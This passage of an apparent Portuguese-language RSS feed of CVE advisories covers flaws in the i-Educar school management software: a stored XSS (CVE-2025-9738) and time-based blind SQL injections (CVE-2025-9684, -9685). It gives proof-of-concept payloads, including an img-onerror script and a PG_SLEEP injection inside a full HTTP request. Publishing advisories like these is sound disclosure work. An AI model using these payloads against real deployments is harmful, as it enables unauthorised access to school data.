&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/intranet/educar_tipo_ensino_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nm_tipo&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9738/image.png&amp;#34;
	width=&amp;#34;582&amp;#34;
	height=&amp;#34;226&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9738/image_hu_8e88176a8609165e.png 480w, /p/cve-2025-9738/image_hu_2cdba1b0a67e9e2a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;257&amp;#34;
		data-flex-basis=&amp;#34;618px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-9738.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 31 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9684</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9684/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9684/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9684-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaedit&amp;#34;&amp;gt;CVE-2025-9684: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9684-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleformulamediaedit&amp;#34;&amp;gt;CVE-2025-9684: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9684&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/FormulaMedia/edit&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#39;&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;&amp;amp;#39;WqeR&amp;amp;#39;=&amp;amp;#39;WqeR
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;exemplo-de-requisição&amp;#34;&amp;gt;Exemplo de Requisição
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/FormulaMedia/edit?id=1%27&#43;AND&#43;7097=(SELECT&#43;7097&#43;FROM&#43;PG_SLEEP(5))&#43;AND&#43;%27WqeR%27=%27WqeR HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: [COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: none
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Este payload introduz um atraso de tempo, demonstrando a capacidade de executar consultas SQL arbitrárias.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9684/image.png&amp;#34;
	width=&amp;#34;1177&amp;#34;
	height=&amp;#34;1049&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9684/image_hu_4da7a86622a45df0.png 480w, /p/cve-2025-9684/image_hu_1f080892d45bc258.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;112&amp;#34;
		data-flex-basis=&amp;#34;269px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Observe o atraso de tempo na resposta do servidor, indicando a execução bem-sucedida do payload SQL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-9684.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sat, 30 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9685</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9685/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9685/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9685-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoview&amp;#34;&amp;gt;CVE-2025-9685: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9685-vulnerabilidade-de-injeção-sql-blind-time-based-no-parâmetro-id-do-endpoint-moduleareaconhecimentoview&amp;#34;&amp;gt;CVE-2025-9685: Vulnerabilidade de Injeção SQL (Blind Time-Based) no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do Endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9685&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de injeção SQL foi descoberta no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; do endpoint &amp;lt;code&amp;gt;/module/AreaConhecimento/view&amp;lt;/code&amp;gt;. Esse problema permite que qualquer invasor não autenticado injete consultas SQL arbitrárias, potencialmente levando a acesso não autorizado aos dados ou exploração adicional, dependendo da configuração do banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue sanitizar adequadamente a entrada fornecida pelo usuário no parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt;. Como resultado, payloads SQL especialmente criados são interpretados diretamente pelo banco de dados de back-end.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
